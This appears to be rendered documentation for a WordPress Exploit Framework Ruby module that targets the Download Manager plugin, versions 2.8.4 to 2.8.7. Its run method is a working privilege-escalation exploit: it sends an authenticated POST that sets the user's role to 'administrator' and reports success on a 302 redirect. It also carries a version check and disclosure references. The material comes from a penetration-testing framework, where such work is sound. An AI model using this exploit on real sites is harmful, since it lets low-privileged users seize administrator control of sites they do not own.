class Wpxf::Auxiliary::DownloadManagerAuthenticatedPrivilegeEscalation

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 6
def initialize
  super

  update_info(
    name: 'Download Manager Authenticated Privilege Escalation',
    desc: %(
      The Download Manager plugin, in versions 2.8.4 to 2.8.7,
      allows authenticated users to escalate their user role to
      that of an administrator.
    ),
    author: [
      'James Golovich', # Disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8365'],
      ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities']
    ],
    date: 'Jan 19 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 28
def check
  check_plugin_version_from_readme('download-manager', '2.8.8', '2.8.4')
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 32
def requires_authentication
  true
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 36
def run
  return false unless super

  body = {
    'wpdm_profile' => {
      'display_name' => username,
      'role' => 'administrator'
    },
    'pfile_data' => {
      'display_name' => username,
      'role' => 'administrator'
    },
    'password'        => password,
    'cpassword'       => password,
    'payment_account' => '0'
  }

  mod_result = true
  scoped_option_change('follow_http_redirection', false) do
    res = execute_post_request(
      url: full_uri,
      body: body,
      cookie: session_cookie
    )

    if res.code == 302
      emit_success "User #{username} now has full admin rights"
    else
      emit_error 'Failed to escalate privileges'
      mod_result = false
    end
  end

  mod_result
end